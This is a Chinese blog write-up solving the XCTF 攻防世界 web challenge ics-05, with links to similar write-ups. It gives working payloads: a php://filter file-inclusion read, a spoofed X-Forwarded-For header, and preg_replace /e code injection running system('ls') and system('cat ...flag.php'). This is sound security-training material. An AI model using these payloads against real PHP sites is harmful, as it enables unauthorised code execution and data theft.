攻防世界:Web区 ics-05

最新推荐文章于 2024-04-08 21:12:02 发布
最新推荐文章于 2024-04-08 21:12:02 发布
阅读量124 收藏
点赞数
文章标签: python php java linux web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793686
版权

PHP漏洞 文件包含 代码注入 源代码获取 HTTP报文伪造
关键词由CSDN通过智能技术生成

靶场分析

image
根据提示,只有设备维护中心有后门且有用:
打开设备维护中心:image
空空如也,检查源代码:image
查看到存在一个?page=index的页面输入,猜想可能存在PHP的文件包含漏洞:
使用payload:?page=php://filter/read=convert.base64-encode/resource=index.php
可以得到一些base64编码,这是index.php的源代码image
建议不要使用python的base64解码,建议使用notepad++的base64解码方案,因为python解码是不能解URL编码,中文解析不出来

解码之后,阅读代码,在最下面,有一个注释加一串代码:

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

这里告诉我们,只要在http报文伪造源IP为127.0.0.1就可以变成“内部人员”

回到index.php(不要去index.php?page=index)
添加报文头:X-Forwarded-For:127.0.0.1
发送image
根据PHP代码提示,使用GET方法注入三个key:pat rep sub
将参数传入到preg_replace函数中
preg_replace()函数存在漏洞:如果使用/e字符作为pattern,中间的replacement的参数会作为php代码解析。
所以我们可以注入GET命令:pat=/c/e&rep=system('ls')&sub=c%20 查看目录:image
看到一个目录:s3chahahaDir
根据出题人的一贯风格,这种hahaha的一般都是有重要信息的东西
访问目录system('cd%20s3chahahaDir%26%26ls')cd s3chahahaDir&&lsimage
继续,里面有个flag目录:system('cd%20s3chahahaDir/flag%26%26ls')image
读取文件system('cat%20s3chahahaDir/flag/flag.php')image
得到flag

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1286
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取码看看直接包含发现会直接运行php文件,那我们怎么获得码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4555
尝试
[wp] 攻防世界 ics-05
MercyLin的博客
09-06 1280
进入题目发现也只有设备维护中心的选项可以点 page传的参数在页面会有回显,fuzz一下:
攻防世界-ics-05
m0_62094846的博客
11-17 2155
点开后发现只有设备维护中心可以点开 看到数据端口请求异常,先想到用burp修改域名,但是修改后 除了加了一句话没什么用 看看代码,有page=index(看wp的,真想不到和文件包含有关) ?page=php://filter/read=convert.base64-encode/resource=index.php 应该是base64 <?php error_reporting(0); @session_start(); posix_setuid(1...
攻防世界 ics-05
m0_54110873的博客
06-28 664
攻防世界ics-05复现~~~~
攻防世界ics-05
wangzhemvp的博客
04-05 682
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。使用 /e 修饰符,preg_replace 会将 replacement 参数当作 PHP 代码执行。php://filter 伪协议查看码 + preg_replace 函数漏洞。1.获取网页代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。page=index 输入什么显示什么,有回显。用php://filter读取网页代码。
攻防世界——ics-05
m0_62063669的博客
06-21 2314
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界web进阶ics-05
gongjingege的博客
07-29 391
打开链接 看了看代码,没发现啥,页面到处点点,只有设备维护中心可以进去 再点了一下云平台设备维护中心,发现url栏?page=index url栏看见page,考虑文件包含漏洞 读取index的代码,参考大佬的wp,用php伪协议php://filter payload:?page=php://filter/read=convert.base64-encode/resource=index.php 得到一段base64,解码 https://tool.chinaz.com/tools/base64.
攻防世界 web高手进阶 8分题 ics-02
闵行小鱼塘
10-04 593
继续ctf的旅程,开始攻防世界web高手进阶的8分题,本文是ics-02的writeup
攻防世界web进阶ics-06
gongjingege的博客
07-09 1013
打开链接 到处点了点,发现只有题目描述里的报表中心可以点进去 发现id=1,改了几个数字,发现页面没有变化,看了看代码,用开发者选项也没有发现,试了试burpsuite抓包,也没发现啥 到网上看了看各位大佬的wp,发现这个题得用burp suite爆破(触及到了我的盲。。。),只能看着大佬的博客,一步步跟着来 抓包后发送给intruder,查看target是否正确,导入字典点击右上角的start attack,开始爆破(发现我的字典里没有2333,刚开始没成功,在字典里加入后才成),点击length自
攻防世界ics-05PHP伪协议+代码审计+Linux指令)
最新发布
2302_79800344的博客
04-08 1420
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
XCTF攻防世界webics-05(含自动化脚本)
weixin_50464560的博客
02-10 894
一、手解 本文借鉴以下两篇文章的指导 https://www.jianshu.com/p/5a502873635b https://blog.csdn.net/about23/article/details/95349625   全部点击一遍,只有这个可以有其他界面   题目描述是 “其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统” 在后面添加login.php 无果,御剑扫描也无结果,码也找不到其他东西 再次点击上面的“云平台设备维
攻防世界-ics-05
weixin_46784800的博客
11-24 2785
ics-05php伪协议题目分析:preg_replace函数漏洞: php伪协议 常用方式: ?file=php://filter/read=convert.base64-encode/resource=index.php 用来查看index.php码。 题目分析: 进入后,点击设备维护中心(只有这一个可以点) 查看代码,可以看见存在一个参数为page,就在“云平台设备维护中心”: 点击该处即可发现自己发现了新世界: 首先判断是否存在文件包含漏洞: /index.php?page={{1+
攻防世界】十七、ics-05
Hi~ 土拨鼠
10-12 1962
步骤 打开题目场景,根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数: 而且参数的内容还会在页面之中显示,尝试看有没有xss,失败: 看来不是这方面的考题,尝试输入index.php,发现返回Ok: 这里还没有看出来是啥,然后又尝试输入index.html,这才恍然大悟这块有文件包含: 既然是文件包含我们就尝试来利用它,尝试使用伪协议php://,它包含两个子协议,功能不同。.
攻防世界ics-05
whisper_ZH的博客
10-06 1158
知识点: php伪协议: php://filter/convert.base64-encode/resource=xx.php preg_replace()函数漏洞 preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) /e 修正符使 pre...
攻防世界---ics-05
qq_44065556的博客
09-26 1482
点进场景看到是很炫酷的页面,题目秒速的是:系统设备维护中心的后门入侵系统,那直奔那里 进来发现什么也没有,到处点一点 在点击时, url发送了变化 出现?page=index 那么联想到可能存在利用文件包含读取网页码的漏洞 用php内置filter伪协议读取文件的代码: ?page=php://filter/read=convert.base64-encode/resource=index.php 访问之后页面出现一大段base64编码 之后去解码得到(给出关键部分) .
攻防世界-web-ics-05
wuh2333的博客
07-12 486
攻防世界ics,命令注入
web-ics-05
07-28
- *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值